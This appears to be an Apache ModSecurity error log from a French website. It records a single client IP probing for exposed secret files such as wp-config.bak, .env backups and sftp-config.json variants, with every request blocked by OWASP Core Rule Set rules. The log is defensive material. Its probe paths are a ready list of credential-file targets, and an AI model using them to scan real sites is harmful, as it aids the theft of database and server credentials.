[Mon May 11 12:19:10.391255 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:17450] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /seeds/wp-config.bak.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/seeds/wp-config.bak.beta"] [unique_id "agGtHr4KNmD_mZ_vlf9C8AAAAFA"]
[Mon May 11 12:19:10.391572 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:17450] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/seeds/wp-config.bak.beta"] [unique_id "agGtHr4KNmD_mZ_vlf9C8AAAAFA"]
[Mon May 11 12:19:13.435528 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:17450] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtHr4KNmD_mZ_vlf9C8AAAAFA"]
[Mon May 11 12:19:13.460284 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:52180] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /seeds/wp-config.bak.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/seeds/wp-config.bak.beta"] [unique_id "agGtIURdw2n9wv6Ai48RiAAAAJA"]
[Mon May 11 12:19:13.460878 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:52180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/seeds/wp-config.bak.beta"] [unique_id "agGtIURdw2n9wv6Ai48RiAAAAJA"]
[Mon May 11 12:19:16.258185 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:52180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtIURdw2n9wv6Ai48RiAAAAJA"]
[Mon May 11 12:19:22.086794 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:52200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /selenium/.env.backup.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/selenium/.env.backup.alpha"] [unique_id "agGtKpkIEwRJMyDaV55X-gAAAUU"]
[Mon May 11 12:19:22.087431 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:52200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/selenium/.env.backup.alpha"] [unique_id "agGtKpkIEwRJMyDaV55X-gAAAUU"]
[Mon May 11 12:19:23.752418 2026] [security2:error] [pid 1256241:tid 1256251] [client 185.177.72.9:52200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtKpkIEwRJMyDaV55X-gAAAUU"]
[Mon May 11 12:19:23.779413 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:27310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /selenium/.env.backup.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/selenium/.env.backup.alpha"] [unique_id "agGtK0Rdw2n9wv6Ai48RmgAAAJY"]
[Mon May 11 12:19:23.783696 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:27310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/selenium/.env.backup.alpha"] [unique_id "agGtK0Rdw2n9wv6Ai48RmgAAAJY"]
[Mon May 11 12:19:26.398060 2026] [security2:error] [pid 1254328:tid 1254379] [client 185.177.72.9:27310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtK0Rdw2n9wv6Ai48RmgAAAJY"]
[Mon May 11 12:19:49.504443 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:51820] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env.live-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/services/.env.live-update"] [unique_id "agGtRZkIEwRJMyDaV55YJQAAAUM"]
[Mon May 11 12:19:49.911481 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:51820] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/services/.env.live-update"] [unique_id "agGtRZkIEwRJMyDaV55YJQAAAUM"]
[Mon May 11 12:19:52.268678 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:51820] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtRZkIEwRJMyDaV55YJQAAAUM"]
[Mon May 11 12:19:52.294788 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:51822] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env.live-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/services/.env.live-update"] [unique_id "agGtSBjZymfuKpjWXeiHFwAAANM"]
[Mon May 11 12:19:52.294995 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:51822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/services/.env.live-update"] [unique_id "agGtSBjZymfuKpjWXeiHFwAAANM"]
[Mon May 11 12:19:53.991725 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:51822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtSBjZymfuKpjWXeiHFwAAANM"]
[Mon May 11 12:20:25.405916 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:38868] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env.docker.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/settings/.env.docker.orig"] [unique_id "agGtaRjZymfuKpjWXeiHUAAAAMc"]
[Mon May 11 12:20:25.406642 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:38868] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/settings/.env.docker.orig"] [unique_id "agGtaRjZymfuKpjWXeiHUAAAAMc"]
[Mon May 11 12:20:26.574803 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:38868] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtaRjZymfuKpjWXeiHUAAAAMc"]
[Mon May 11 12:20:26.599813 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:38870] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env.docker.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/settings/.env.docker.orig"] [unique_id "agGtakYQeUtAPynIs6xjYgAAAAM"]
[Mon May 11 12:20:26.600027 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:38870] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/settings/.env.docker.orig"] [unique_id "agGtakYQeUtAPynIs6xjYgAAAAM"]
[Mon May 11 12:20:27.829307 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:38870] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtakYQeUtAPynIs6xjYgAAAAM"]
[Mon May 11 12:20:35.242271 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:65210] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json-fix"] [unique_id "agGtcxjZymfuKpjWXeiHcwAAAMU"]
[Mon May 11 12:20:35.242496 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:65210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json-fix"] [unique_id "agGtcxjZymfuKpjWXeiHcwAAAMU"]
[Mon May 11 12:20:36.449848 2026] [security2:error] [pid 1254133:tid 1254141] [client 185.177.72.9:65210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtcxjZymfuKpjWXeiHcwAAAMU"]
[Mon May 11 12:20:36.475690 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:65218] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json-fix"] [unique_id "agGtdJkIEwRJMyDaV55YdAAAAU4"]
[Mon May 11 12:20:36.476358 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:65218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json-fix"] [unique_id "agGtdJkIEwRJMyDaV55YdAAAAU4"]
[Mon May 11 12:20:37.698673 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:65218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtdJkIEwRJMyDaV55YdAAAAU4"]
[Mon May 11 12:20:37.726431 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:65228] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json.inactive"] [unique_id "agGtdWS6k_SCYd1AVZq44AAAARM"]
[Mon May 11 12:20:37.726741 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:65228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/sftp-config.json.inactive"] [unique_id "agGtdWS6k_SCYd1AVZq44AAAARM"]
[Mon May 11 12:20:38.884562 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:65228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtdWS6k_SCYd1AVZq44AAAARM"]
[Mon May 11 12:20:38.912041 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:65236] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json.inactive"] [unique_id "agGtdkYQeUtAPynIs6xjbQAAAAU"]
[Mon May 11 12:20:38.912266 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:65236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/sftp-config.json.inactive"] [unique_id "agGtdkYQeUtAPynIs6xjbQAAAAU"]
[Mon May 11 12:20:40.144128 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:65236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtdkYQeUtAPynIs6xjbQAAAAU"]
[Mon May 11 12:20:40.170604 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:65250] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /share/.env.save2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/share/.env.save2024"] [unique_id "agGteEYQeUtAPynIs6xjbwAAABI"]
[Mon May 11 12:20:40.171015 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:65250] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/share/.env.save2024"] [unique_id "agGteEYQeUtAPynIs6xjbwAAABI"]
[Mon May 11 12:20:41.316143 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:65250] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGteEYQeUtAPynIs6xjbwAAABI"]
